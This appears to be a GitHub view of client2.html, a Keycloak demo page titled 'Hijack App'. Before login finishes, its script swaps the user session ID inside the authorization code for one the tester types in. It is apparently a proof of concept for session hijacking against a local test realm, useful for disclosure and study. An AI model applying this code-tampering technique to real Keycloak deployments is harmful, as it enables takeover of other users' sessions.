-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathclient2.html
55 lines (50 loc) · 1.92 KB
/
client2.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<html lang="en">
<head>
<title>Welcome to Hijack App</title>
<script src="keycloak.js"></script>
<script>
const keycloak = new Keycloak({
url: 'http://localhost:8080',
realm: 'test',
clientId: 'client2',
});
function preInitHook() {
const params = new URLSearchParams(window.location.hash.substring(1));
console.log(params);
if (params.has('code') && !params.has('sessionIdAdjusted')) {
const parsedCode = params.get('code').split('.');
const userSessionId = prompt(`Current User Session ID is:\n${parsedCode[1]}\nUser Session ID to hijack (leave empty to do not override):`);
if (userSessionId) {
parsedCode[1] = userSessionId;
params.set('code', parsedCode.join('.'));
params.set('sessionIdAdjusted', 'true');
window.location.hash = `#${params.toString()}`;
}
}
}
function initKeycloak() {
preInitHook();
keycloak.init({
checkLoginIframe: false,
onLoad: 'login-required',
}).then(function (authenticated) {
document.getElementById('result').textContent = authenticated ? 'authenticated' : 'not authenticated';
if (authenticated) {
document.getElementById('user').textContent = keycloak.idTokenParsed.preferred_username || '';
}
}).catch(function (e) {
console.error(e);
document.getElementById('result').textContent = 'failed to initialize';
});
}
function logout() {
keycloak.logout();
}
</script>
</head>
<body onLoad="initKeycloak()">
<div id="result"></div>
<div id="user"></div>
<button onClick="logout()">Logout</button>
</body>
</html>